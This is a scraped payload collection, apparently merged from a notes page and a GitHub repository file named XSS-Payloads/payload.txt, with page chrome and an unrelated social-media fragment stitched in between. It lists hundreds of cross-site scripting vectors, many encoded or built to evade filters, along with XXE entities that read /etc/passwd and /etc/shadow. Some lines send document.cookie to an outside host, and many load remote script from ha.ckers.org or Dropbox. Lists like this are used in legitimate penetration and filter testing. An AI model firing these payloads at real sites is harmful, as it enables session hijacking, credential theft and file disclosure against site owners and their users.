url(http://www.securitycompass.com/xss.js);"> [Mozilla] ";>;<;BODY onload!#$%&;()*~+-_.,:;?@[/|\]^`=alert(";XSS";)>; <;/script>;<;script>;alert(1)<;/script>; <;/br style=a:expression(alert())>; <;scrscriptipt>;alert(1)<;/scrscriptipt>; <;br size=\";&;{alert('XSS')}\";>; perl -e 'print \";<;IMG SRC=java\0script:alert(\";XSS\";)>;\";;' >; out perl -e 'print \";<;SCR\0IPT>;alert(\";XSS\";)<;/SCR\0IPT>;\";;' >; out <~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> <~/XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/?sid="%2bdocument.cookie)> <~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> <~/XSS STYLE=xss:expression(alert('XSS'))> "><script>alert('XSS')</script> </XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> XSS STYLE=xss:e/**/xpression(alert('XSS'))> </XSS STYLE=xss:expression(alert('XSS'))> >"><script>alert("XSS")</script>& "><STYLE>@import"javascript:alert('XSS')";</STYLE> >"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)> >%22%27><img%20src%3d%22javascript:alert(%27%20XSS%27)%22> '%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e' "> >" '';!--"<XSS>=&{()} <IMG SRC="javascript:alert('XSS');"> <IMG SRC=javascript:alert('XSS')> <IMG SRC=JaVaScRiPt:alert('XSS')> <IMG SRC=JaVaScRiPt:alert("XSS<WBR>")> <IMGSRC=java&<WBR>#115;crip&<WBR>#116;:ale&<WBR>#114;t('X&#83<WBR>;S'&#41> <IMGSRC=&#0000106&#0000097&<WBR>#0000118&#0000097&#0000115&<WBR>#0000099&#0000114&#0000105&<WBR>#0000112&#0000116&#0000058&<WBR>#0000097&#0000108&#0000101&<WBR>#0000114&#0000116&#0000040&<WBR>#0000039&#0000088&#0000083&<WBR>#0000083&#0000039&#0000041>     <IMGSRC=&#x6A&#x61&#x76&#x61&#x73&<WBR>#x63&#x72&#x69&#x70&#x74&#x3A&<WBR>#x61&#x6C&#x65&#x72&#x74&#x28&<WBR>#x27&#x58&#x53&#x53&#x27&#x29> <IMG SRC="javascript:alert(<WBR>'XSS');"> <IMG SRC="javascript:alert(<WBR>'XSS');"> <![CDATA[<script>var n=0;while(true){n++;}</script>]]> <?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('gotcha');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo> <?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[' or 1=1 or ''=']]></foof> <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:/boot.ini">]><foo>&xee;</foo> <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xee;</foo> <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/shadow">]><foo>&xee;</foo> <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///dev/random">]><foo>&xee;</foo> <script>alert('XSS')</script> %3cscript%3ealert('XSS')%3c/script%3e %22%3e%3cscript%3ealert('XSS')%3c/script%3e <IMG SRC="javascript:alert('XSS');"> <IMG SRC=javascript:alert("XSS")> <IMG SRC=javascript:alert('XSS')>       <img src=xss onerror=alert(1)> <IMG """><SCRIPT>alert("XSS")</SCRIPT>"> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> <IMG SRC="jav ascript:alert('XSS');"> <IMG SRC="jav ascript:alert('XSS');"> <IMG SRC=javascript:alert('XSS')> <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> <BODY BACKGROUND="javascript:alert('XSS')"> <BODY ONLOAD=alert('XSS')> <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> <IMG SRC="javascript:alert('XSS')" <iframe src=http://ha.ckers.org/scriptlet.html < <<SCRIPT>alert("XSS");//<</SCRIPT> %253cscript%253ealert(1)%253c/script%253e "><s"%2b"cript>alert(document.cookie)</script> foo<script>alert(1)</script> <scr<script>ipt>alert(1)</scr</script>ipt> <SCRIPT>String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)</SCRIPT> ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> <marquee onstart='javascript:alert('1');'>=(?_?)=
1 note · View note
Text
rrr
Skip to content
                                                                                     Why GitHub?                                                                                                                                
                             Enterprise              
                                                                   Explore                                                                                                                                
                             Marketplace              
                                                                   Pricing                                                                                                                                
                   Sign in
           Sign up
                 15      
                 256      
               247      
pgaijin66
/
XSS-Payloads
           Code      
               Issues        0        
           Pull requests      0      
           Projects      0
                   Security
           Insights
                                                                     Join GitHub today          
GitHub is home to over 36 million developers working together to host and review code, manage projects, and build software together.
       XSS-Payloads/payload.txt      
pgaijin66
Add files via upload
af350ef
         on Aug 23, 2016                                                                      525 lines (433 sloc)          27.3 KB                                                                            <script>alert(123);</script>                    <ScRipT>alert("XSS");</ScRipT>                    <script>alert(123)</script>                    <script>alert("hellox worldss");</script>                    <script>alert(“XSS”)</script>                    <script>alert(“XSS”);</script>                    <script>alert(‘XSS’)</script>                    “><script>alert(“XSS”)</script>                    <script>alert(/XSS”)</script>                    <script>alert(/XSS/)</script>                    </script><script>alert(1)</script>                    ‘; alert(1);                    ‘)alert(1);//                    <ScRiPt>alert(1)</sCriPt>                    <IMG SRC=jAVasCrIPt:alert(‘XSS’)>                    <IMG SRC=”javascript:alert(‘XSS’);”>                    <IMG SRC=javascript:alert("XSS")>                    <IMG SRC=javascript:alert(‘XSS’)>                          <img src=xss onerror=alert(1)>                                                            <iframe %00 src="&Tab;javascript:prompt(1)&Tab;"%00>                                        <svg><style>{font-family&colon;'<iframe/onload=confirm(1)>'                                        <input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;"                                        <sVg><scRipt %00>alert&lpar;1&rpar; {Opera}                                        <img/src=`%00` onerror=this.onerror=confirm(1)                                        <form><isindex formaction="javascript&colon;confirm(1)"                                        <img src=`%00`&NewLine; onerror=alert(1)&NewLine;                                        <script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script>                                        <ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?                                        <iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">                                        <script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/                                        "><h1/onmouseover='\u0061lert(1)'>%00                                        <iframe/src="data:text/html,<svg onload=alert(1)>">                                        <meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/>                                        <svg><script xlink:href=data&colon;,window.open('https://www.google.com/')></script                                        <svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}                                        <meta http-equiv="refresh" content="0;url=javascript:confirm(1)">                    <iframe src=javascript&colon;alert&lpar;document&period;location&rpar;>                                        <form><a href="javascript:\u0061lert(1)">X                                        </script><img/*%00/src="worksinchrome&colon;prompt(1)"/%00*/onerror='eval(src)'>                    <img/ &#11; src=`~` onerror=prompt(1)>                    <form><iframe &#11; src="javascript:alert(1)"&#11; ;>                                        <a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==" &#11;>X</a                                        http://www.google<script .com>alert(document.location)</script                                        <a href=[&#00;]"&#00; onmouseover=prompt(1)//">XYZ</a                                        <img/src=@ onerror = prompt('1')                                        <style/onload=prompt('XSS')                                        <script ^__^>alert(String.fromCharCode(49))</script ^__^                                        </style ><script :-(>/**/alert(document.location)/**/</script :-(                                        &#00;</form><input type="date" onfocus="alert(1)">                                        <form><textarea onkeyup='\u0061\u006C\u0065\u0072\u0074(1)'>                                        <script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/                                        <iframe srcdoc='<body onload=prompt&lpar;1&rpar;>'>                                        <a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a>                                        <script ~~~>alert(0%0)</script ~~~>                                        <style/onload=<!-- >alert&lpar;1&rpar;>                                        <///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN                                        <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1)                                        "><svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>'                                        <blink/ onmouseover=prompt(1)>OnMouseOver {Firefox & Opera}                                        <marquee onstart='javascript:alert(1)'>^__^                                        <div/style="width:expression(confirm(1))">X</div> {IE7}                                        <iframe/%00/ src=javaSCRIPT&colon;alert(1)                                        //<form/action=javascript:alert&lpar;document&period;cookie&rpar;><input/type='submit'>//                                        /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>                                        //|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\                                        </font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</style>                                        <a/href="javascript: javascript:prompt(1)"><input type="X">                                        </plaintext\></|\><plaintext/onmouseover=prompt(1)                                        </svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert(1) {Opera}                                        <a href="javascript&colon;\u0061l&#101%72t&lpar;1&rpar;"><button>                                        <div onmouseover='alert&lpar;1&rpar;'>DIV</div>                                        <iframe style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">                                        <a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a>                                        <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">                                        <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">                                        <var onmouseover="prompt(1)">On Mouse Over</var>                                        <a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a>                                        <img src="/" =_=" title="onerror='prompt(1)'">                                        <%<!--'%><script>alert(1);</script -->                                        <script src="data:text/javascript,alert(1)"></script>                    <iframe/src \/\/onload = prompt(1)                                        <iframe/onreadystatechange=alert(1)                                        <svg/onload=alert(1)                                        <input value=<><iframe/src=javascript:confirm(1)                                        <input type="text" value=`` <div/onmouseover='alert(1)'>X</div>                                        http://www.<script>alert(1)</script .com                                        <iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe>                                        <svg><script ?>alert(1)                                        <iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>                                        <img src=`xx:xx`onerror=alert(1)>                                        <meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>                    <math><a xlink:href="//jsfiddle.net/t846h/">click                                        <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>                    <svg contentScriptType=text/vbs><script>MsgBox+1                                        <a href="data:text/html;base64_,<svg/onload=\u0061l&#101%72t(1)>">X</a                                        <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>                                        <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+                                        <script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F                    <script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script                                        <object data=javascript&colon;\u0061l&#101%72t(1)>                                        <script>+-+-1-+-+alert(1)</script>                                        <body/onload=<!-->&#10alert(1)>                                        <script itworksinallbrowsers>/*<script* */alert(1)</script                                        <img src ?itworksonchrome?\/onerror = alert(1)                                        <svg><script>//&NewLine;confirm(1);</script </svg>                    <svg><script onlypossibleinopera:-)> alert(1)                                        <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script:&#97lert(1)>ClickMe                                        <script x> alert(1) </script 1=2                                        <div/onmouseover='alert(1)'> style="x:">                                        <--`<img/src=` onerror=alert(1)> --!>                     <script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,alert(1)></script>                                        <div style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>                                        "><img src=x onerror=window.open('https://www.google.com/');>                                        <form><button formaction=javascript&colon;alert(1)>CLICKME                                        <math><a xlink:href="//jsfiddle.net/t846h/">click                                        <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>                                        <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>                                        <a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a>                                        <SCRIPT>String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)</SCRIPT>                    ‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//–></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>                    <IMG “””><SCRIPT>alert(“XSS”)</SCRIPT>”>                    <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>                    <IMG SRC=”jav ascript:alert(‘XSS’);”>                    <IMG SRC=”jav ascript:alert(‘XSS’);”>                    <<SCRIPT>alert(“XSS”);//<</SCRIPT>                    %253cscript%253ealert(1)%253c/script%253e                    “><s”%2b”cript>alert(document.cookie)</script>                    foo<script>alert(1)</script>                    <scr<script>ipt>alert(1)</scr</script>ipt>                    <IMG SRC=javascript:alert('XSS')>                    <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>                    <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>                    <BODY BACKGROUND=”javascript:alert(‘XSS’)”>                    <BODY ONLOAD=alert(‘XSS’)>                    <INPUT TYPE=”IMAGE” SRC=”javascript:alert(‘XSS’);”>                    <IMG SRC=”javascript:alert(‘XSS’)”                    <iframe src=http://ha.ckers.org/scriptlet.html <                    javascript:alert("hellox worldss")                    <img src="javascript:alert('XSS');">                    <img src=javascript:alert("XSS")>                    <"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>                    <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">                    <IFRAME SRC="javascript:alert('XSS');"></IFRAME>                    <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>                    <SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>                    <SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>                    <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>                    <SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>                    <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>                    <<SCRIPT>alert("XSS");//<</SCRIPT>                    <"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>                    ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))<?/SCRIPT>&submit.x=27&submit.y=9&cmd=search                    <script>alert("hellox worldss")</script>&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510                    <script>alert("XSS");</script>&search=1                    0&q=';alert(String.fromCharCode(88,83,83))//\';alert%2?8String.fromCharCode(88,83,83))//";alert(String.fromCharCode?(88,83,83))//\";alert(String.fromCharCode(88,83,83)%?29//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83%?2C83))</SCRIPT>&submit-frmGoogleWeb=Web+Search                    <h1><font color=blue>hellox worldss</h1>                    <BODY ONLOAD=alert('hellox worldss')>                    <input onfocus=write(XSS) autofocus>                    <input onblur=write(XSS) autofocus><input autofocus>                    <body onscroll=alert(XSS)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>                    <form><button formaction="javascript:alert(XSS)">lol                    <!--<img src="--><img src=x onerror=alert(XSS)//">                    <![><img src="]><img src=x onerror=alert(XSS)//">                    <style><img src="</style><img src=x onerror=alert(XSS)//">                    <? foo="><script>alert(1)</script>">                    <! foo="><script>alert(1)</script>">                    </ foo="><script>alert(1)</script>">                    <? foo="><x foo='?><script>alert(1)</script>'>">                    <! foo="[[[Inception]]"><x foo="]foo><script>alert(1)</script>">                    <% foo><x foo="%><script>alert(123)</script>">                    <div style="font-family:'foo;color:red;';">LOL                    LOL<style>*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;}</style>                    <script>({0:#0=alert/#0#/#0#(0)})</script>                    <svg xmlns="http://www.w3.org/2000/svg">LOL<script>alert(123)</script></svg>                    <SCRIPT>alert(/XSS/.source)</SCRIPT>                    \\";alert('XSS');//                    </TITLE><SCRIPT>alert(\"XSS\");</SCRIPT>                    <INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert('XSS');\">                    <BODY BACKGROUND=\"javascript:alert('XSS')\">                    <BODY ONLOAD=alert('XSS')>                    <IMG DYNSRC=\"javascript:alert('XSS')\">                    <IMG LOWSRC=\"javascript:alert('XSS')\">                    <BGSOUND SRC=\"javascript:alert('XSS');\">                    <BR SIZE=\"&{alert('XSS')}\">                    <LAYER SRC=\"http://ha.ckers.org/scriptlet.html\"></LAYER>                    <LINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\">                    <LINK REL=\"stylesheet\" HREF=\"http://ha.ckers.org/xss.css\">                    <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>                    <META HTTP-EQUIV=\"Link\" Content=\"<http://ha.ckers.org/xss.css>; REL=stylesheet\">                    <STYLE>BODY{-moz-binding:url(\"http://ha.ckers.org/xssmoz.xml#xss\")}</STYLE>                    <XSS STYLE=\"behavior: url(xss.htc);\">                    <STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS                    <IMG SRC='vbscript:msgbox(\"XSS\")'>                    <IMG SRC=\"mocha:[code]\">                    <IMG SRC=\"livescript:[code]\">                    žscriptualert(EXSSE)ž/scriptu                    <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">                    <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\">                    <META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\"                    <IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>                    <FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>                    <TABLE BACKGROUND=\"javascript:alert('XSS')\">                    <TABLE><TD BACKGROUND=\"javascript:alert('XSS')\">                    <DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">                    <DIV STYLE=\"background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029\">                    <DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">                    <DIV STYLE=\"width: expression(alert('XSS'));\">                    <STYLE>@im\port'\ja\vasc\ript:alert(\"XSS\")';</STYLE>                    <IMG STYLE=\"xss:expr/*XSS*/ession(alert('XSS'))\">                    <XSS STYLE=\"xss:expression(alert('XSS'))\">                    exp/*<A STYLE='no\xss:noxss(\"*//*\");                    xss:ex/*XSS*//*/*/pression(alert(\"XSS\"))'>                    <STYLE TYPE=\"text/javascript\">alert('XSS');</STYLE>                    <STYLE>.XSS{background-image:url(\"javascript:alert('XSS')\");}</STYLE><A CLASS=XSS></A>                    <STYLE type=\"text/css\">BODY{background:url(\"javascript:alert('XSS')\")}</STYLE>                    <!--[if gte IE 4]>                    <SCRIPT>alert('XSS');</SCRIPT>                    <![endif]-->                    <BASE HREF=\"javascript:alert('XSS');//\">                    <OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http://ha.ckers.org/scriptlet.html\"></OBJECT>                    <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>                    <EMBED SRC=\"http://ha.ckers.org/xss.swf\" AllowScriptAccess=\"always\"></EMBED>                    <EMBED SRC=\"data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\" type=\"image/svg+xml\" AllowScriptAccess=\"always\"></EMBED>                    a=\"get\";                    b=\"URL(\\"\";                    c=\"javascript:\";                    d=\"alert('XSS');\\")\";                    eval(a+b+c+d);                    <HTML xmlns:xss><?import namespace=\"xss\" implementation=\"http://ha.ckers.org/xss.htc\"><xss:xss>XSS</xss:xss></HTML>                    <XML ID=I><X><C><![CDATA[<IMG SRC=\"javas]]><![CDATA[cript:alert('XSS');\">]]>                    </C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>                    <XML ID=\"xss\"><I><B><IMG SRC=\"javas<!-- -->cript:alert('XSS')\"></B></I></XML>                    <SPAN DATASRC=\"#xss\" DATAFLD=\"B\" DATAFORMATAS=\"HTML\"></SPAN>                    <XML SRC=\"xsstest.xml\" ID=I></XML>                    <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>                    <HTML><BODY>                    <?xml:namespace prefix=\"t\" ns=\"urn:schemas-microsoft-com:time\">                    <?import namespace=\"t\" implementation=\"#default#time2\">                    <t:set attributeName=\"innerHTML\" to=\"XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>\">                    </BODY></HTML>                    <SCRIPT SRC=\"http://ha.ckers.org/xss.jpg\"></SCRIPT>                    <!--#exec cmd=\"/bin/echo '<SCR'\"--><!--#exec cmd=\"/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'\"-->                    <? echo('<SCR)';                    echo('IPT>alert(\"XSS\")</SCRIPT>'); ?>                    <IMG SRC=\"http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode\">                    Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser                    <META HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=<SCRIPT>alert('XSS')</SCRIPT>\">                    <HEAD><META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-                    <SCRIPT a=\">\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>                    <SCRIPT =\">\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>                    <SCRIPT a=\">\" '' SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>                    <SCRIPT \"a='>'\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>                    <SCRIPT a=`>` SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>                    <SCRIPT a=\">'>\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>                    <SCRIPT>document.write(\"<SCRI\");</SCRIPT>PT SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>                    <A HREF=\"http://66.102.7.147/\">XSS</A>                    <A HREF=\"http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\">XSS</A>                    <A HREF=\"http://1113982867/\">XSS</A>                    <A HREF=\"http://0x42.0x0000066.0x7.0x93/\">XSS</A>                    <A HREF=\"http://0102.0146.0007.00000223/\">XSS</A>                    <A HREF=\"htt p://6 6.000146.0x7.147/\">XSS</A>                    <A HREF=\"//www.google.com/\">XSS</A>                    <A HREF=\"//google\">XSS</A>                    <A HREF=\"http://ha.ckers.org@google\">XSS</A>                    <A HREF=\"http://google:ha.ckers.org\">XSS</A>                    <A HREF=\"http://google.com/\">XSS</A>                    <A HREF=\"http://www.google.com./\">XSS</A>                    <A HREF=\"javascript:document.location='http://www.google.com/'\">XSS</A>                    <A HREF=\"http://www.gohttp://www.google.com/ogle.com/\">XSS</A>                    <                    %3C                    &lt                    <                    &LT                    &LT;                    &#60                    &#060                    &#0060                    &#00060                    &#000060                    &#0000060                    <                    &#x3c                    &#x03c                    &#x003c                    